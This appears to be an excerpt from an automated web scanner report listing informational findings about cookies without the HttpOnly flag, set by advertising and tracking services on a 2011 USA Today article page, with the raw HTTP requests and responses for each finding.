The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=37740&ref=&apv=false&rand=0.639346786076203&sig=d HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="; obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1304955408827; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:48 GMT; Path=/
Set-Cookie: _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; Domain=outbrain.com; Expires=Mon, 16-May-2011 04:24:48 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 15:36:48 GMT; Path=/
Set-Cookie: recs-8277e0910d750195b448797616e091ad="0Md6VLP4uVjlx5iB105rBFRGss1g9D1+UIrDZa62H8d9q/U+7rfsSHzfTAzVZtzvGFOIAx+Zi6c="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 15:41:48 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 15:36:48 GMT
Content-Length: 5487

outbrain_rater.returnedOdbData({'response':{'exec_time':15,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'203024277','req_id':'cfa057c0cd3cd3e521294623f49f9d62'},'score':{'preferred
...[SNIP]...

11.41. http://odb.outbrain.com/utils/ping.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/ping.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.5672100060619414 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; tick=1304954969218; _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDl/XT8eOgMJurT0dWeqNOpcg=="; _lvd2=27vfag1ZPzfDGaK+UsDEF+7sgWSAHBie; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 15:36:48 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Mon, 09 May 2011 15:36:48 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

11.42. http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7108-2.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7108-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; cd=false; ruid=154dab7990adc1d6f3372c12^10^1304954976^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=12590^2&13549^1&5032^2; csi2=3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 16:36:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1&5032^3; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=58982; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3187892.js^1^1304955417^1304955417&3164882.js^1^1304954981^1304954981&3186629.js^1^1304954976^1304954976&3196046.js^2^1304949680^1304949693&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 15:36:57 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Via: CN-5000
Proxy-Connection: Keep-Alive
Content-Length: 1535

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<script type="text/javascript">
rubicon_cb = Math.random(); rubicon_rurl = docum
...[SNIP]...

11.43. http://pix04.revsci.net/D08734/a1/0/3/0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39CEJZjpv597JwPKJxC5gZVtCsylMowZVqFba93uE88QpuDb5ZC9UQMpBwKgJsgsK/5y/VyTHjCWG4SoGRm5dWoFU7PHkVBVRsmPo8ulpSziaGfT5EodlaMm+vF2r3l/c95LrsITXHJ2I1zqJbIwuKe5PN2KgWbN8mNcvi/u7eq2U+HGkHowc+nxezhSslqi3VLe86ut3/CbD7ii3elUpunmujKWIZxPJ9ltUcyTIwhrqdTnfK90aiYPaKzaUqqi1CDohU8VolCkQ/PbXsT0D64lEj1zTEx0fYZK083py+2GEeADpri0HRNaxF300KQuDjQ6yz58+/gEwpcHSlXrUjeL+Q+A2KWMxSaXE3vLUGnK762eDMdGneRi4Z5R/PDaDROL3MikWyJfZq3hJmDPIcsKjZ7WKze1UFa9+VR6Daqv9+IX/j69KWQiiGHN62ZLnTvJDkw/+LGzEdm+xrncZe/MTLl/tzGbC6OZ0xyhOwOxLvpW4OEBvo1vFPZqQ8/4dUIZ9c/tMlDDqcpEk6cZrfGczZNcJ07uJ6oe4iZsjKWewFYiQsK/rbrMrdrfQ/1Su1smIgKxV/Y7oSQzXAjnycWIGfDTAndbGihpi8nFzveXcTFNP5ap414bqma34KoXwzYOq2sc7L4a4qOCmcRiLxjHOc0PPPoNmxhfMWndLuIWTqiOZ4fC0D3IIa7verqW/TDSuCVZ4/orK2q93e17LqkrpOdscw4BbMow6IH7X1OwrXgdjH2/vC9ieEfItiNwQm/uKzk/rnEcVobls6XLls68BM8P9BLC9CTJ6FW1a2w9AOYL2XuoVlnxrjqQPEq4TJtb4mppTU9JrmC9dDEMVwLVNX2aP+Qizf0csOzMy1yU7/fW8h2V1Fh2MeGTjho24iDQqgz4BHQnU7cajGik/56FuARVHL/klg+jUrgSyRsWErWs4tagMBICsdSAiN4tHzJKNsWD1RNYyM2mz7OtgN34QjNO13raQh9KK+UWgc5rtxG0dJuMCoIB4X/hheL8GjEwr+reg/R3m7iuStF0nM5KEJf8qN3Jd3KNrW29NASW0ZNG8TRP3WpdNC1EXEgHYHAjK5b8qNIxRpUqD7btnu/7mzW1a5L/HqPfjtu2qmBWPXPU0k8BdOhAlQGKzABVcTeH7d4Na8CZMdKgNzi52xXhAHqzGYP6Jv3XrXlkJmmp8JzGb+Gmv13RIc2KjMZHqcXB+aXLsPdbwjNmb9lJ2+oUGpQZgH12jfK8uKuHOnVxIzQbugywkDX47CIxRV5y+bCwKY89nBay4+AXw/XyremaQ19e7j9A65Xeqz8nK6eezLWs2STWqnAYxnLskLHMzo52qf22tCqcGXq7CGYNR5tfPHBaQhbi8L0bj1ToQM3w0EEhFavgGW8SLtdUODbZFMwPPZ9LSkHDkpM0wf0Hxef3U9E+m2XvWGHg3cU92f5el+wGICUvGb+KsKCaxvvG7KIz2Thse+5WRvmy6IkCYwqk9KHBsTqashxrqRTPDf+cLSf8Y3dw=; rsiPus_GcbX="MLsXrqEO5ihr4JB0esFCP3iNF+pqmr69ENWrChMuiN+dmZss5tWSaGYzfZrs4FkB8vHaExBOdq4FjNOXBUu39W/3K2EuxA2rLiiq5uEzbhBp2qqHLka+ldHHpySEQN7Ig6ZX2s1Xts6k3/V+F1BVNaX7P2AMt0j6s7SVkIqtY6fBmuqDg3HiDPDRsFu8LYGpdAgFuZrn7788WLSfiPN4FcsWpCManqMes4eDphzgluz0J7T/7NL09GWQZKgq0h2UqnrAalLP4GpQ2z6NoJmqhjf8ll+bI1mb+2NJpMp3lsbhQW6smYNRkIcBnGSsjC6V8lHV22qN0wsd7pUjrGcn2MZyDk4pHLi3HPlqzfwOFLKkUZX5pylobtQ4XT7CPkVynIhqs2Jdqx6Qbv+DVlcJEcLKaGs26CcQXDhIjPrjQmHNTw104A6YB2yPj9aadbsR9G2g+Sx1IMWC03cSleVUYqmsonOsNwBq4IYZ0iEAxN1kj79GMm/TFvViob6tBGl9piggG1ojpl++EI4CZ/DO72bnJ5uiK6A+hD9jowvMcmzWV7pm2A+BZXOctz9mBcFlA1NhVrVlT54nZulBkGghmR6LfWnx7wRhTDuJYLIL9CjgkLULZ5OwAnDvGtd8c9/IcoSF7rvvCCwxXrXbNkbJA5UJXZiQQ32aGD42CB8j4Uuicv5NhrCu90msLuL0yXPFEkF+ghJXl4UoCPpQReyKPwLxU7P8scUESOUmDQbJ26zmYoM5EYK5HRM13xlFLDjmN3gr3gzLy3PBXRfK/0inM3mgODaJYIQsP4tG3dxQXtc5BzlJZExi106qBh3X8ZgtVrG+Lsw/MFccxeVYnXDkPkatfVNHemuSBEnlJdlwJ7HaraMYTm4mdXxBXuNRVT1qtXz/N4fX76mCnHZapZ8HwTns8rRrVf85AMpSS1M+G68+RoH70ohcdXqH83XdOwulC23J/LnyGSVNe7uFY075AoD/k5/OVIoNr6nsjen9TP6PMT4mikP8tgoCsDB1P2MYAQIhWsgnQghE6D5W6j3EAllSXGbQxYfklk9PQ5HF/mqinW6N2HQc"; rsi_us_1000000="pUMVIzlHMAYY1A3HkAz1jyt3tlSj9WvRyFxc7CYdMac7y9zNu2VAbbuAi9eNwCUC8Wl4wOOguOEurHKK5ymr+WMVxLrjQRwI/BIpxOPADBg2yufgfgLgTu5j4fLTEQPVeuiSCftktrpjidSb3tKRT16/qhDddfs4YO14yGwo3mknI3Zsage7Hp/us89s/r8sHOwuTFP/CGJvF0CBpAcFUrFpcSeddZugAt2/rJIEsl5lFIWoWu0NxYgUpdu1epUcSWwK6nXWutDM3kjbS6MwxlDUEHsfiC/tX/ajBDdyf6FoclGT9hYvZ6yHELxTGV52+gM/KNJ7HFfCnqBSHyO9h6K2IG72DZG1gnriBn20N4unmsPk3dyDXHODxND8UIYEdTEJhqUeX0XH8ufbk9oKEcwKphMNOSzMjsdEazx5OG/X/voubSxcMfLggv+AZDDDoXbGHiM/jsG6UCatRfU6qwA/nFJ2HLM4H6Vwy6n5QW6iEtTBjhACVrgjSJ1n0sxNueMqqowm9U9MjFONHQUR6SKVk9owlMGLCJ812+Zr34276nVTgfXxsLZ0YiftaKJuIZ0xP8YY9WkMkt9n8RFkDTls6k1BC7v58lSYgZALXT+bKUXFsuSpAsJNWsLmyWs+XDUQmVb0hR/fcPrwgVJhI4ZuwOsX3RWEdg83luatgZ5+TKYM1It/I+VexFONR38x4qDP9iS3Y7dK1r0pZRdkAEwT968QaKX4dePJx+FsOolAvtn/m15h6VbBjCGtzXDFJsq0asZ+2cixyyycOZ0q9ZO0pv1gaqV+NlgOEwszeFk1G7zGPKs7Hn4CRU8RwJ3PC192d/zQh845eP57+B+obaWwyCioHG3FOYiiZ8MJGnrYDWOTh6FFkJ/lnooujf2FtYlU9jKpfaACfJAKJrmg0lUhzCxs3khsT9cbaSuhk/AIXUky6y/7/4/TdCE/G9rDhkcJMYJhTogOtss3qAESQMf2AR/2GXUB9mpl5kBSpRkjsPnWAmqvOIHRkFGc7ucL8rPj3ymJwl+PX2ItsAHmMq2EnmNyakB+vuFAuT9h5l25oI1IwUVAVoafxDxIVvNI3J0B6g0A1HzsmnY5z077NnItIJh3xRNWe/iXIU+CrYWmkPOTjLSuO4lfoF4riXFUJbckXujjUDMTlq5PEpGKQnlA56Zfg9qW912fdgXl6AA2hOYwMsuwUbGDBMFhQ6XfL09iRogg1WfYzxZ2Np6PvGSDERHaUwP8t0euXTq2Q3eSJ4ppXnS6iCAnGFPbCsrGjyRLOmYtFL2Im/UUecMgAjO9mIZcYqqjLobxUzRXN7iqDqCwIOmEyWQ0dYPcKR9laCXq+0nRJKCUAJQnStj+/JYwWMQHmQKF2Ca/hmc4+baAz6xM2NKxfNlISgW/KhdUaqQ38MUa0a1KSbc9v0K8egn0NfsoKiOYm7vbWfw20dVvNkxG4pyhchNYi+IfuzopLXmexn1k8T0TEIckb31ULLX5aO+Lk6yh9ODYCQQrLrxanBsN1+8zTf3vg5v7l3gwefT81PMYeXwyan8ecHtrQGmGtzs3pQzd"; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=pUP148mheQIMp6aIYFMFhpiBTp0ewycLkSMn2XM56x7k86fOUiLBQqeJuRU19v0kP9hCu7ltr4Q0pDR2sjqSKwTn94cFOMB5DZyKe6g0kN+uerbnSHQDBGqiEiZNBpF4U+GyTeR2tmSJEi+FG92cKAmsHJkliACoYEQmcB3FM/F12NCBHdiUmDq+7dUCekotGUVfajS7GgYLiS0YaTUV9RCh+cM+phBpeG46dYS4jD+Zgk0L6B3st2y3FqJfPdpuu+bJjQg7U9xVDcMu/+ikerESRO28KZ5NocRAzbIwG+0KntS05C5h3MEypsuz3vovc43LO37Uov2xZejynpV3SDQqL6DaCPm1LY4D7GX6jqSqaIXoBJgU0na+nSYs0M1OmqeaeF1dZdx2Odgg8B5LwM5nFkQ4730ZKzbtbNlxdDh7gdQ1qu3WjtT8nQo4KUPGpAQqz2kqbA8gmcFmfYb6eRTyTE3syc6JZEbc6XR8JY3jCuu6F807ErRBgxnDLKK/eiPAL43DYXst10tKNAc/EyQ9o/YdIxf0Ms4J8/+4qEmT7cIpyYYWZc6jxz6dT3qsMif5xRpHmT/jvyRzKfu4UJ++fl0=; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; rtc_4-db=MLvn9jM1Jgpr54aeixlPU0iJzD/A1gw/s7z5FPHjTbcjQe6SyjZfNBHlcl0kJ6xb7KxXS0n/wkRC4loA/0F2wkRHZcOAJEq4Dwzt2Om/1LFFe33wUlIYHWgk3JIf+57YTIrZsByUWltzFrRLWQkJwcRM8WAjEeY4ROXqVRqWqlFCk3HzeZvB7UqDKiMm+em65LEdFCubQva+uhYCU4TAdQsM9NhX+ug+P8ELz2+3GiBBzM1wCymg8+GPH7Y69+xviE6Hqdz7ujIwlbK5VxRJUDXsPScW0OuLen2n5XNIVQWV0a6zZscEKSvJFJ+qcEq4+Z9S+ATaANDLtiqSIrA0MATfpgfCqefcfJ5CLtyChbBOQcNQdYq/ZTXHQ2nKTygG5ksEGSLhhMLTH3nLtfSmf7myMaOLY9aJ02OHl/Fu6Y2wQS84P004/LHAfRc/BEHwKgDZY8E4JJEL71uMwA2eeEdPVYKPG/DduFctll24uU8j2YMNsWENRh4hK5IbB0czI2gWw5thigBcBZIP3XJrVHNnhsObnvvXwCKWWfWdYI3v4TRgyMWKw6d8zcNUriJHuzJ6gN4inlSjVhNBgUR06cCYuTzRv8kU21/Nb5c0ZNbuKLudEWUgq1+Mw5po5VTwWXV0xjFGISH481xxkQrS9f+z4zfknHQSyR966h01FYMsS7zsQtcKlrarNO/PXZK/VVXoeRIalnaoFkvriwrBt9uojqEElV6GOWaCOj9t8u2MX6+ewAiFR8qEF4hCbHQN2w3i7zZxx9jglR+zktHHdI+AaME6nwVOuSWRSMmbBOJQiBGVEKcZZtrixm6A0EkvkXGQhi1mkiDJt28P6lC1YPWnqEjsa1VFxuyj6OhVtpRJH+e2y6R4/cnzJ+CfcLnbecp3jLkBN3A9WKkj160OlWZ6bQrrtnaiNyLK+hjDarrW1/e7DkcyYpLMH7VZ0PoS679JljmXMuDgV63vGcd/l2Xeq07wDl5+804DPNFxxXEWxZK2JxenUyorOZ05lAucMiUYnwDH43x2r3zq4+jzvmUOijuNnDDQC6c2U37Xp4k3g6we4z0Ry3aft2vhGeNZfdQa6KWZJbHpsiIPOCcIXMd7rRsTytymDxbBcSdJSOF12B9Pjw5Zd4nETw83mqHLJNXb+avDtVTPJTZvtMw/WF863sU5PyifACD+WfVm7plRes9cpmKCPcJQ7KvRISbVPTZwwZPbZ+ibDRrmqQ75C3n12yoLgcMTFwwpUXIE8ayLlistW77NupnYkEPzdtEpAoN9Gh3vRGfHy0oQz19wzUQqJlA28pDJ1tX/7iOBCPg6ZY5H+poLDVjrVtXfWnmVV69M+2ceRBwsL9kP8Sh4kd0vsFLne73RkEScWjpHV7/ppEg88FcDKahaMhEZyiRDsKA570XuyQw+UqP5VTXr4GySHBYP6zLT3+/tCziDDi6NClG6rdihdMlrm4QYe4xpq3GPbtAWr82gHnL3YXN2W2EYYdhilT+MNpndsp7h20igjE/HbpSLspAok9tNFXqbEYlOwELgS+lv9Ifkr2X+d0pgrqiQQ0d9l6fgzE+vTxRX/lSqhrDbZ8AP5hPvWP8yU2CWGjyJOp+IQMzxLbCeyMUCOswZyF9Szp3O3Ji1sOZtE3XxCc0gQdRJoaas/cK6jDrj+Zn0IMRafowVEGLGJ68i+1GuK1MUVVnvoLFt0mEIVuYfpXQ0Ox3EP6fd4MwQt7ZSlCzlXGh+Uyu5r2kFhlZQi9L/2q/8uNAomOxLyyaFNZVc6DYQZk9rPmOUl/1BLQsf1hbETMCwzqBObuJhhJm/LMoMBrGq/Uo14rgZ/IiEUZxD2wQsnkg4zyIS9BU59fSAJXFKHCXXf9N00ud61sG4DWv4Y9jKKolUZ0s/uTUq3gugjF+d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUP140OheXIQT7uItGF29/wo/tk8g4QbtKcNWkMCr9n5v3YWnhFMqxnmqlK+Gc3/wmfzpefVKVOPRwvg9X9qS4Xlt5lFeEjyrCtjorBQnqW8IT3pQ3MAZe2lCyw1VgQ19l0SDSzamrGgdEnTehCE73GO6SfeEvGfB/ePW28Rjc+UaUKTzAr3qiT/E/A9iRiZlc09NzQfZT+Q9Ymr70uPTN8A4+lXcq6fLkpp85x9BYjIPzyVRaIMfvXcE7GhMcxwg/lm9SHxHYKFHBYQ2o5m7r63leZFfgV7CmDuCwwp/0YqFBRUgbIgHNZwxcHHEMwRoWPDkmgde/mWBP/120+ym2Fdx+QEjnC4JXCdsw38qknRoGyPcG400b06tFsRd5IpSwRppKnKYKvEdswTOPdlJfOt0N6IkIu4FWZmqnStN/kKDmzr1iwdI+ii1W25IMOZNdZbJa3py9RQjZPceLBAZ1jP/Ati11gEXXmZEKluAM5eBX4NUAsc1YtgTE+NflZ/r4izPl4l/+I1spjfCAZGiGlM171DRo5gEbrE0NS2nc+ggk/G/baDI5/fT26SVty8KokWzLIj9Ye/GtxREtxpNRP0vu5GF1wH; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:21 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39C8JZjpr557JwPKJHPJjVm4nwPAq6ZsbBfuMZB+wNajXjGLCTArLHxzvFq5u+Lwe27lFrnW5WnLzYnzoo2t7qX/KLEKT0mz5bKv0pvHmYlxlCeTJQ7TkZAi9DAPv7SOGmgPMsA//ngmK65gvnHiZEgD1RPhot8Sv09jEec4+rpWoBcU4p12DFf1hQ51Zt4HV8KHA+AfXXn8mwu1/yhYGaCnua8u4HxwGlL9kV3ot398KqTQrWG+ECZ6nLxccn6nffh/n/AGAeAOvVvnhS9Tbd3e25afHbIr8P3Klg0BIZV11qACgR+FitkMBpAaq6bgxupo2pXO2XH0Ly71cTsb8KJPn+UqHcjzeGUImy9VkyAcxejgwxnXEsVoG0TaMXFratkJpKkVirjS5iBPG2/iGxwMqCJS0fddN3FxzsdAEUDsw76c9iUElqZK5wr6Q2bcdyj1o978UjDp5ektzMNfH0cZVPyLFucCKaAsWDcfHJWhOw08TO5Tw7Na4qyEGER+VlahvHG0iTGWfMIeOdDGKDyxij4oKjr/Ol96Eu5IfTJPJdYpTmrWK7qQMkS/YtQL8x/Yv2Nysg0xUuBm6na/qK93wf8Ff4MDPEErMYXJzmmAGd5pAvuQ9Si8pp0pQFoX3Xp+OTxRzMCImdmSj3PtPsUHWdYuQnJDm8IkPgwFKU/gbvv0iXFuCbx9r2GCP7FESzfa8M5nAstxCR9GSYXoNd8RS5azEOe01zI+qM5qwx6eLy/38GDFU7Eev4DIbAtKPxAb1EhS2Jbp5qgmJDMF/H9CfJ4O6B/yDXT9QWynPv70ELi1cl/39Iqh9P0hENBAahxWJF8UMMPhWxKveVeZUlIufin3Xlbf3kf+5HtiVdERpK+cYDBxWBfhCFJ+ssjgk5bC8qBfQdF+dgOkKC5sCOUfNHr8U/0Y0mBWnaFSJCfC0GokPGHvGfXcWXQA/aN0L2p32OB2EsP/j8CBsieqwkdVmGo4FpVwyzbOC7YzL/Bj1d8Er4rhcMEpNp5RqB7QNZFnv25FgFeJeE8TY2EO/hJhkCOv2MhJMPDPIpGkNJbbZ+iJWaxls0uh2rInrkCm6+0CLHZfOURb3HtTse93ne7LDCUlY3NSeRxrne2NTfxxNjKnBvyFgDGmbHBbzWHPyJMj7Jee4h4TSazw0SeKkJZhTXtRsv+aslm3RvB8nWLYdC4jbRdO47GqW1uX6Tb7TjnFCsAxQ48JBxiUYGEtekoZnQRL3tJuSnSsS8cZD4pTE8vrS+cwnGhv3XOZdcWLwAbqQ+t8Xz+xRVRjB0WUfTiXR2deTz972Lq4Lk+olhAhdwf63yN562SC5wjeiHhgK7PUa1b4akirYdjqU8Oz2D92utPhebTGN05RB5lGjeM4WNU1UxmCqbZvfTJaZtLDPGaVwtQT0b0T7mHf0RdthcaAE5+gaDFQlm4qhMWtQYk5uFpmkvkCNJg7DGdsHTLYBy4GFVd+t3Iif4YotDvuc8Qq7AN0MakaMcaAEN2htJmRB8CCSbuUoyTE=; Domain=.revsci.net; Expires=Tue, 08-May-2012 15:38:21 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
